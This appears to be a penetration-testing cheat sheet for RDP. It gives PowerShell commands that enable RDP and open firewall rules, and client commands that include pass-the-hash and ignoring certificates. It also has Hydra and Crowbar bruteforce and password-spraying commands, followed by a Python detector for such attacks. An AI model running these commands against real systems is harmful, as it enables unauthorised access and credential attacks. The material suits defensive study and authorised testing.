RDP → Remote Desktop Protocol
Ports
3389
Enabling RDP
Editing Windows Registry Values
# Allow incoming Remote Desktop connections
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
# Do not disable UDP transport on the RDP client
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services\Client" -Name "fClientDisableUDP" -Value 0
# Require Network Level Authentication (NLA)
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
Allowing Inbound RDP Connections
TCP
New-NetFirewallRule -DisplayName "RDP (TCP)" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389 -RemoteAddress $RemoteAddress -Profile Any -Enabled True | Out-Null
UDP
New-NetFirewallRule -DisplayName "RDP (UDP)" -Direction Inbound -Action Allow -Protocol UDP -LocalPort 3389 -RemoteAddress $RemoteAddress -Profile Any -Enabled True | Out-Null
Remote Connection
XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>
Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>
Due to certain account restrictions applied to the remote machine, an attacker may have to enable the following policy →
Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignore
Remmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>
RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORD> <TARGET>
Bruteforcing || Password Spraying
Crowbar
Bruteforcing
- User ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -u <USERNAME> -C <PASSWDLIST>
- Userlist ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -C <PASSWDLIST>
Password Spraying
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -c '<PASSWORD>'
Hydra
Bruteforcing
- User ↔ Passwordlist
hydra -T <THREADS> -l <USERNAME> -P <PASSWDLIST> rdp://<TARGET>
- Userlist ↔ Passwordlist
hydra -T <THREADS> -L <USERLIST> -P <PASSWDLIST> rdp://<TARGET>
Password Spraying
hydra -T <THREADS> -L <USERLIST> -p '<PASSWORD>' rdp://<TARGET>
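Detection
Bruteforcing and password spraying leave different shapes in failed-logon telemetry: many failures against one account versus a few failures against each of many accounts. The sketch below is an added example, not part of the original page; it assumes failed RDP logons (Security event 4625, LogonType 3 with NLA or 10 without) were already extracted for one time window as (source IP, user) pairs, and the thresholds and sample data are constructed.

```python
from collections import defaultdict

# Constructed sample: (source_ip, target_user) pairs from failed-logon events.
SAMPLE_FAILURES = (
    [("203.0.113.10", "administrator")] * 40                   # one user, many guesses
    + [("203.0.113.20", f"user{i:02d}") for i in range(25)]    # many users, one guess each
    + [("198.51.100.5", "alice"), ("198.51.100.5", "alice")]   # ordinary typos
)


def classify_sources(failures, min_failures=10, spray_users=10, max_per_user=3):
    """Label each source IP by the shape of its failed RDP logons.

    Thresholds are illustrative assumptions; tune them to the environment.
    """
    per_ip = defaultdict(lambda: defaultdict(int))
    for ip, user in failures:
        per_ip[ip][user.lower()] += 1  # account names are case-insensitive

    verdicts = {}
    for ip, users in per_ip.items():
        total = sum(users.values())
        heaviest = max(users.values())  # failures against the most-hit account
        if total < min_failures:
            verdicts[ip] = "normal"
        elif len(users) >= spray_users and heaviest <= max_per_user:
            # Wide and shallow: many accounts, very few guesses per account.
            verdicts[ip] = "password-spraying"
        elif heaviest >= min_failures:
            # Deep: at least one account hammered with many guesses.
            verdicts[ip] = "bruteforce"
        else:
            verdicts[ip] = "suspicious"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_FAILURES).items()):
        print(f"{ip:15} {verdict}")
```

Spraying stays under per-account lockout thresholds, so it only shows up when failures are aggregated per source rather than per account.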